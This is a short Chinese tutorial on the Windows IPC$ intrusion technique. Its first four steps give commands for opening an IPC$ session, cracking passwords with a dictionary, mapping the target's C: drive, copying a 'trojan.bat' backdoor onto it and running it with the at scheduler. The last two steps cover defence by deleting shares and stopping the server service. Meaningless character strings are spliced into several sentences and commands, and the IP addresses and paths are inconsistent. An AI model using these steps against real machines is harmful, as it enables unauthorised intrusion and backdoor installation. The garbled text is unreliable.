1、首先,说一下大埂琴逾癌概的渗透思路:先建立空连接获得目标主机的用户列表,这个命令是: net use \\ip(192.128.0.101)\ipc$ "(密码)&鳎溻趄酃quot; /user:"(用户名)", 然后使用字典破解密码
2、获得用户名和密码后,再使用获得的账号密码加入到刚鸬钟召蜗才的 net命令,接下来把对方 c盘映射到本地,使用命令:net use z多唉捋胝: \\ip(192.128.0.101)\ipc$我们会发现本地多了个Z盘,这就是目标C盘的目录了。
3、接下来我们在上传一个trojan后门,可以直接复制,或者使用COPY命令,如下copy c: \trojan.bat \\ip(192.168.0.101)c$ ,这样可以把bat文件复制到目标的c盘目录下。
4、接着,执行这个后门程序,先查看目标机器的时间,使用at命令:net time \\192.168.0.101,接着执行 at \\192.168.0.101 12:00 c:\trojan.bat
5、所以,一旦获取了用户名和密码,计算机就很可能中马。我们可以通过 net share 查看自己电脑开启的共享,然后使用 net share 共享名 /del 删除该共享。
6、最保险的就是禁用IPC$服务,使用命令 net stop server ,选择 yes。禁用所有的共享服务。
